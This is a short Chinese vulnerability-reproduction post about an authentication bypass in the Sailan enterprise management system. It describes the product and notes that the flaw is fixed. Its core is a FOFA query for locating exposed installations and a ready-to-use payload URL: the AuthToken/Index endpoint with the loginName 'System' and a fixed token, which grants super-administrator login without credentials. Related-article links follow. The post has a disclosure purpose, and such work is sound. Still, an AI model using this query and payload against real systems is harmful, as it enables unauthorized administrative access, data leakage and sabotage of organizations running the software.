漏洞复现-赛蓝-企业管理系统

本文来自无问社区,更多漏洞复现可前往查看http://www.wwlib.cn/index.php/index

0x01 产品简介

赛蓝企业管理系统是一款为企业提供全面管理解决方案的软件系统,它能够帮助企业实现精细化管理,提高效率,降低成本。系统集成了多种管理功能,包括但不限于项目管理、财务管理、采购管理、销售管理以及报表分析等,旨在为企业提供一站式的管理解决方案。该系统以先进的管理思想为引导,结合企业实际业务流程,通过信息化手段提升企业管理水平。

0x02 漏洞概述

赛蓝企业管理系统 AuthToken/Index 接口存在身份认证绕过漏洞,未授权的远程攻击者可以利用此接口构造token绕过身份认证,使用超级管理员账户登录系统后台,造成信息泄露或者恶意破坏,使系统处于极不安全的状态。

建议升级到最新版本

已修复

0x03 复现环境

FOFA:body="www.cailsoft.com" || body="赛蓝企业管理系统"

payload:

/AuthToken/Index?loginName=System&token=c94ad0c0aee8b1f23b138484f014131f

效果图:

相关推荐
brrdg_sefg7 分钟前
WEB 漏洞 - 文件包含漏洞深度解析
前端·网络·安全
浏览器爱好者27 分钟前
谷歌浏览器的网络安全检测工具介绍
chrome·安全
独行soc2 小时前
#渗透测试#漏洞挖掘#红蓝攻防#护网#sql注入介绍11基于XML的SQL注入(XML-Based SQL Injection)
数据库·安全·web安全·漏洞挖掘·sql注入·hw·xml注入
风间琉璃""3 小时前
bugkctf 渗透测试1超详细版
数据库·web安全·网络安全·渗透测试·内网·安全工具
drebander3 小时前
SQL 实战-巧用 CASE WHEN 实现条件分组与统计
大数据·数据库·sql
18号房客3 小时前
高级sql技巧进阶教程
大数据·数据库·数据仓库·sql·mysql·时序数据库·数据库架构
Dawnㅤ3 小时前
使用sql实现将一张表的某些字段数据存到另一种表里
数据库·sql
儒道易行3 小时前
【DSVW】攻防实战全记录
web安全·网络安全
黄金右肾3 小时前
Qt之数据库使用(十四)
sql·qt·sqlite·database